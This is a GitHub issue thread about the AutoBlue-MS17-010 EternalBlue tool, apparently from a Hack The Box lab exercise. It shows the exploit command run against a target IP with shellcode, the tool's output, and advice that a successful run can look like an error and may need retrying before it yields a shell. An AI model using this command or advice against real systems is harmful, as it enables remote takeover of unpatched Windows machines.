3ndG4me/AutoBlue-MS17-010

eternalblue_exploit7.py - INVALID_PARAMETER

forensic65x opened this issue · 2 comments

I've confirmed the target is vulnerable (blue - HTB).

I've created the shellcode without errors.

I've started the listener without errors.

I get the following error when attempting the eternalblue exploit.

root@host/opt/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin 12
shellcode size: 2203
numGroomConn: 12
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

Any suggestions?

Hi, this output is actually the sign of a successful execution and it is not an error. Is the exploit completing successfully (are you getting a shell?).

Sometime it doesn’t always work the first time.

Good catch. I didn't get a shell the first time. I didn't see any activity in the listener window so I assumed something didn't compile correctly. I should have tried again before opening an issue. Thanks for the quick response - second attempt got a shell.